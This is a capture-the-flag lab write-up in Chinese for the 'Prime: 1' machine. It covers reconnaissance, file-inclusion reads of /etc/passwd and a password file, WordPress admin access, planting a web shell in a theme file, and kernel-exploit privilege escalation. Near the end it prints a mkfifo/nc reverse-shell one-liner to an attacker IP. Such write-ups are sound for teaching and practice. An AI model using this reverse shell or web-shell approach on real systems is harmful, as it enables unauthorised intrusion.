Prime: 1

0x01 信息收集

nmap探测一下端口

开放了22和80

就放了一张图，看了页面源代码也没有提示，还是扫一扫路径吧

index.php就是首页，index.php/login也是首页，/dev打开是一个提示

和我说我在第0关..真实渗透测试很难什么的..整成这样我还以为是隐写，binwalk和foremost都用了一下也没找到图片里面藏了什么，然而我的隐写水平就这么一点，所以换个大字典继续扫目录

这里仔细看可以发现index.php后面的参数不一样返回的长度不一样，可以判断这里是有file这个参数的，并且返回了一下东西

还扫出了这些，总结一下现在扫出的文件有

index.php image.php secret.txt /dev /wordpress，一个个看过去

image.php和index.php一样也是一张图片，secret.txt是一个提示

下面提示有一个location.txt文件，直接访问发现访问不到，顺便看了一下github

看到这个好像是想提示fuzz参数，说实话我除了爆破木马的时候会fuzz参数别的时候都没用过..

现在想起字典里面那个不一样的长度，估计有一个参数就是file，再去看看加了参数的index.php

路径改了几次之后都是这样的，想到前面有个location.txt，放到参数后面试一试

有新的提示了，说是可以进行下一步挖掘，使用secrettier360这个参数在别的php页面上获得乐趣

别的php页面的话，应该就是之前扫到的image.php

在这个页面用参数读到了/etc/passwd

后面有提示去这个用户的家目录下找password.txt

下面这个应该是密码，记一下follow_the_ippsec，尝试访问一下别的文件也没有

之前nmap扫到22端口是开着的，用这个密码连接试试

然而还是连接不上..

话说前面还扫出一个wordpress的，去看看

就啥都没，一个全新的wordpress，用wpscan扫扫看

然而也没有什么东西

去后台看一下，可能后台可以用到刚刚得到的密码，去后台登录一下试试

使用saket/follow_the_ippsec登录失败，想到前面在/etc/passwd里面还有几个用户，拿那些名字过来试试，emmm看了一下其实就只有一个victor了，别的都是不可登录的，那就用这个再尝试一下

登陆成功

0x02 getshell

wordpress后台getshell我知道的不多，先看看有没有上传点，有上传点但是上传目录不可写..本来还想用前面那个文件包含的..只能再看看

看到插件这里可以编辑php代码

查了下插件的路径是url+/wp-content/plugins/

修改一下这里的php代码，然后..然后保存不了？？？

只能再翻翻，终于在Appearance->Theme Editor下找到了一个secret.php可写，前面我还以为是浏览器的问题，还换了浏览器..

写进去保存一下就好了，然后路径找不到，去网上下了个wordpress找找

/wp-content/themes/twentynineteen/secret.php

蚁剑连接一下

0x03 提权

看了下是ubuntu16.04，内核是4.10，好像也不能使用suid提权，去找找有没有提权的脚本

感觉这个脚本挺符合的，内核还是版本都符合，编译一下试试

那边先反弹一下shell

用bash弹不出来，靶机里面有nc但是没有-e参数，去翻了翻文章‘可以用下面的方法反弹

1

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.163.128 60001 >/tmp/f

升级一下shell，把编译好的exp传上去

成功提权之后得到key